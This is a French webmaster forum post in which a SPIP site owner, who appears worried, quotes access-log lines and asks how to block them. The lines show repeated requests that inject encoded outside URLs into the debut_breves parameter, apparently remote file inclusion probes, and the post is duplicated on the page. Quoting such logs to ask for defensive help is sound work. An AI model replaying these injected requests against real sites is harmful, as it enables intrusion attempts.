inquiet, logs suspects
3 messages
• Page 1 sur 1
Consultez la formation à Google Analytics de WebRankInfo / Ranking Metrics
-
tofm2 - WRInaute passionné
- Messages: 2196
- Inscription: 9 Avr 2005
inquiet, logs suspects
le Mar Mar 04, 2008 7:53
Bonjour
depuis quelque temps, je tombe sur des logs suspects sur un de mes sites développé sous spip
(à voir sur écran large)
nat1024.national-net.com www.monsite .com - [04/Mar/2008:00:38:00 +0100] "GET /spip.php?breve2&debut_breves=5&debut_breves=http%3A%2F%2Fwww.pattibus.it%2Fphplib-7.2b%2Fpages%2Filosi%2Fdohigal%2F&debut_breves=5&debut_breves=5&debut_breves=5 HTTP/1.0" 200 10536 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
nat1024.national-net.com www.monsite .com - [04/Mar/2008:00:38:00 +0100] "GET /spip.php?breve2&debut_breves=5&debut_breves=http%3A%2F%2Fwww.cjp.spb.ru%2Fen%2Ftis%2Fleboma%2F&debut_breves=5&debut_breves=5&debut_breves=5 HTTP/1.0" 200 10515 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
nat1024.national-net.com www.monsite .com - [04/Mar/2008:00:38:01 +0100] "GET /spip.php?breve2&debut_breves=5&debut_breves=http%3A%2F%2Fwww.northfans.ch%2Fforum%2Fadmin%2Fsettings%2Fgucor%2Fujusu%2F&debut_breves=5&debut_breves=5&debut_breves=5 HTTP/1.0" 200 10540 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
ce qui m'inquiète c'est les codes ascii qui remplacent les caractères / et :
des fois j'ai des url de 3 kms avec des tentatives d'injection de code et d'URL
nat1024.national-net.com www.monsite .com - [04/Mar/2008:00:39:32 +0100] "GET /spip.php?breve2&debut_breves=5&debut_breves=http%3A%2F%2Fwww.obrasmecanicasch.com%2Fomch%2Fimg%2Fitofu%2Fviroja%2F&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5 HTTP/1.0" 200 11315 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
nat1024.national-net.com www.monsite .com - [04/Mar/2008:00:39:33 +0100] "GET /spip.php?breve2&debut_breves=5&debut_breves=http%3A%2F%2Fwww.pattibus.it%2Fphplib-7.2b%2Fpages%2Filosi%2Fdohigal%2F&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5 HTTP/1.0" 200 11316 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
nat1024.national-net.com www.monsite .com - [04/Mar/2008:00:39:34 +0100] "GET /spip.php?breve2&debut_breves=5&debut_breves=http%3A%2F%2Fsahel55.com%2Farticles%2Fomaduro%2Fkimumid%2F&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5 HTTP/1.0" 200 11303 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
QUe penser de cette activité, sachant que si je tape cette URL dans la barre d'adresse de mon navigateur, je n'ai rien de particulier que l'article correspondant (code 200)
Y a t'il un moyen de parer cette activité, avec .htaccess, une rewrite rule ou je ne sais pas..
merci de votre attention.
depuis quelque temps, je tombe sur des logs suspects sur un de mes sites développé sous spip
(à voir sur écran large)
nat1024.national-net.com www.monsite .com - [04/Mar/2008:00:38:00 +0100] "GET /spip.php?breve2&debut_breves=5&debut_breves=http%3A%2F%2Fwww.pattibus.it%2Fphplib-7.2b%2Fpages%2Filosi%2Fdohigal%2F&debut_breves=5&debut_breves=5&debut_breves=5 HTTP/1.0" 200 10536 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
nat1024.national-net.com www.monsite .com - [04/Mar/2008:00:38:00 +0100] "GET /spip.php?breve2&debut_breves=5&debut_breves=http%3A%2F%2Fwww.cjp.spb.ru%2Fen%2Ftis%2Fleboma%2F&debut_breves=5&debut_breves=5&debut_breves=5 HTTP/1.0" 200 10515 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
nat1024.national-net.com www.monsite .com - [04/Mar/2008:00:38:01 +0100] "GET /spip.php?breve2&debut_breves=5&debut_breves=http%3A%2F%2Fwww.northfans.ch%2Fforum%2Fadmin%2Fsettings%2Fgucor%2Fujusu%2F&debut_breves=5&debut_breves=5&debut_breves=5 HTTP/1.0" 200 10540 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
ce qui m'inquiète c'est les codes ascii qui remplacent les caractères / et :
des fois j'ai des url de 3 kms avec des tentatives d'injection de code et d'URL
nat1024.national-net.com www.monsite .com - [04/Mar/2008:00:39:32 +0100] "GET /spip.php?breve2&debut_breves=5&debut_breves=http%3A%2F%2Fwww.obrasmecanicasch.com%2Fomch%2Fimg%2Fitofu%2Fviroja%2F&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5 HTTP/1.0" 200 11315 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
nat1024.national-net.com www.monsite .com - [04/Mar/2008:00:39:33 +0100] "GET /spip.php?breve2&debut_breves=5&debut_breves=http%3A%2F%2Fwww.pattibus.it%2Fphplib-7.2b%2Fpages%2Filosi%2Fdohigal%2F&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5 HTTP/1.0" 200 11316 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
nat1024.national-net.com www.monsite .com - [04/Mar/2008:00:39:34 +0100] "GET /spip.php?breve2&debut_breves=5&debut_breves=http%3A%2F%2Fsahel55.com%2Farticles%2Fomaduro%2Fkimumid%2F&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5 HTTP/1.0" 200 11303 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
QUe penser de cette activité, sachant que si je tape cette URL dans la barre d'adresse de mon navigateur, je n'ai rien de particulier que l'article correspondant (code 200)
Y a t'il un moyen de parer cette activité, avec .htaccess, une rewrite rule ou je ne sais pas..
merci de votre attention.
3 messages
• Page 1 sur 1
Formation recommandée sur ce thème :
Formation Google Analytics : en 2 jours, apprenez comment exploiter l'essentiel des possibilités de l'outil de mesure d'audience de Google. Formation animée par les experts Google Analytics de Ranking Metrics.
Tous les détails sur le site Ranking Metrics : programme, prix, dates et lieux, inscription en ligne.
Lectures recommandées sur ce thème :
- Les crawlers de Yahoo! - 18-03-2004
- Les adresses IP de Google et Googlebot - 05-10-2006
- Découpage du forum webmaster en 2 forums - 10-08-2005
- Google crawle les fichiers CSS - 25-06-2006
- Yahoo Slurp et autres robots d'indexation de Yahoo - 07-03-2004
- Bingbot : le nom officiel du robot de Bing - 29-06-2010
Qui est en ligne
Utilisateurs parcourant ce forum: Aucun utilisateur enregistré et 1 invité
Contact
Confidentialité